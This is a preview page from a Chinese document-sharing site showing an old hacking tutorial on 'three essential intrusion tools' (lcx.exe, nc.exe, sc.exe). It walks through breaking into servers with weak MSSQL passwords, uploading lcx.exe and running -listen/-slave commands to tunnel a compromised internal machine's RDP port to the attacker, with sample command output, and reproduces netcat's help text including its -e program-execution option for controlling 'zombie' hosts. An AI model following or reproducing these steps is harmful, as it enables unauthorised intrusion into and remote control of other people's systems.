资源预览内容
第1页 / 共10页
第2页 / 共10页
第3页 / 共10页
第4页 / 共10页
第5页 / 共10页
第6页 / 共10页
第7页 / 共10页
第8页 / 共10页
第9页 / 共10页
第10页 / 共10页
亲,该文档总共10页全部预览完了,如果喜欢就下载吧!
资源描述
三个入侵的必备小工具-lcx.exe、nc.exe、sc.exelcx.exe 的使用方法以前抓肉鸡都是通过 1433弱口令,然后.但是发现很多服务器开了 1433,3389,但是终端是连不上的 ,因为服务器本 身是在 内网 ,只对外 开放了 1433 端口,幸好有 lcx.exe 这个东西,用 sqltools.exe 传倒服务器上.lcx.exe 是个端口转发工具,相当于把肉鸡 A 上的 3389 端口转发到 B 机上 , 当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的 3389.用法:如在本机B上监听-listen 51 3389,在肉鸡A上运行-slave本机 ip 51肉鸡ip 3389那么在本地连127.0.0.1就可以连肉鸡的3389.第二条是 本机转向。例:现在有一个ip为201.1.1.1的1433弱用端口扫描只发现开放了 1433 端口.用 sqltools 链接,dir 看一下 C:DIR C:2004/09/1710:32 2005/02/2117:08avgun.log。 日语, 显示不正常. 呵呵.netstat-an口 TCP 0.0.0.0:3376autoAK查看0.0.0.0:012,541 。开放端LISTENINGTCP0.0.0.0:33890.0.0.0:0LISTENINGTCP0.0.0.0:37910.0.0.0:0LISTENINGTCP0.0.0.0:38770.0.0.0:0LISTENING终端已开. 看下 IPipconfigC:ipconfigWindows 2000 IP Configuration Ethernet adapterConnection-specific DNS SuffixIP Address:192.168.1.24Subnet Mask :255.255.255.0Default Gateway :192.168.1.1192这样的是内网了.现在可以用lcx.exe搞定了.上传 lcx.exe 到肉鸡.C:dir lcx.exeC:WINNTsystem322006/04/0213:4032,768 lcx.exe 首先在自己机子的 cmd 下运行lcx.exe -listen 51 3389意思是监听51端口并转发到3389端口显示如下+ Listening port 51 + Listen OK!+ Listening port 3389 + Listen OK!+ Waiting for Client on port:51 然后在肉鸡上运行 lcx.exe -slave你的 IP 51 201.1.1.1 3389201.1.1.1是我举例用的肉鸡IP.换成你的.运行以后本机监听端口就会收到信 息.+ Listening port 51 + Listen OK!+ Listening port 3389 + Listen OK!+ Waiting for Client on port:51 + Accept a Client on port 55 from 201.1.1.1 + Waiting another Client on port:3389 好了 . 现在在自己机子上链接127.0.0.1 或者输你自己 IP.发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡 A 了!优点,搞 定内网肉鸡.缺点,有点麻烦,而且每次都要通过 sqltools 先进行端口转发. 当然也可以用反 弹木马控制肉鸡了 nc.exe 的使用方法1. Netcat 1.10 for NT nc11nt.zip,原始英文信息2. Netcat 1.10 for NT 帮助信息3. Netcat 1.10 常用的命令格式4. 管理肉鸡, 更改肉鸡设置5. 下载连接#1. Netcat 1.10 for NT nc11nt.zip#Basic Features* Outbound or inbound connections, TCP or UDP, to or from any ports* Full DNS forward/reverse checking, with appropriate warnings* Ability to use any local source port* Ability to use any locallyconfigured network source address* Builtin portscanning capabilities, with randomizer* Can read command line arguments from standard inputb* Slowsend mode, one line every N seconds* Hex dump of transmitted and received data* Ability to let another program service establishedconnections* Telnet-options responder New for NT* Ability to run in the background without a console window* Ability to restart as a single-threaded server to handle a new connectionSome of the features of netcat are:Outbound or inbound connections, TCP or UDP, to or from any ports Full DNS forward/reverse checking, with appropriate warnings Ability to use any local source portAbility to use any locally-configured network source address Built-in port-scanning capabilities, with randomizerBuilt-in loose source-routing capabilityCan read command line arguments from standard inputSlow-send mode, one line every N secondsOptional ability to let another program service inbound connections Some of the potential uses of netcat:Script backendsScanning ports and inventorying servicesBackup handlersFile transfersServer testing and simulationFirewall testingProxy gatewayingNetwork performance testingAddress spoofing testsProtecting X servers1001 other uses you ll likely come up withNetcat + Encryption = Cryptcat对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以 看出来了.1.1 NC.EXE 是一个非标准的 telnet 客户端程序,1.2 还有一个 putty.exe 客户端程序, 提供四种连接模式 -raw -telnet -rlogin -ssh.# #2. Netcat 1.10 for NT 帮助信息# #C:WINDOWSDesktopnc -hv1.10 NTconnect to somewhere: nc -options hostname ports ports . listen for inbound: nc -l -p port options hostname port options:-d detach from console, background mode (后台模式)-e prog inbound program to exec dangerous!-g gateway source-routing hop points, up to 8 -G num source-routing pointer: 4, 8, 12, .-h this cruft (本帮助信息)-i secs delay interval for lines sent, ports scanned (延迟时间)-l listen mode, for inbound connects (监听模式,等待连接)-L listen harder, re-listen on socket close (连接关闭后,仍然继续监听) -n numeric-only IP addresses, no DNS (ip 数字模式,非 dns 解析) -o file hex dump of traffic (十六进制模式输出文件,三段)-p port local port number (本地端口)-r randomize local and remote ports (随机本地远程端口)-s addr local source address (本地源地址)-t answer TELNET negotiation-u UDP mode-v verbose use twice to be more verbose (-vv 更多信息)-w secs timeout for connects and final net reads-z zero-I/O mode used for scanning(扫描模式,-vv) port numbers can be individual or ranges: m-n inclusive #
网站客服QQ:2055934822
金锄头文库版权所有
经营许可证:蜀ICP备13022795号 | 川公网安备 51140202000112号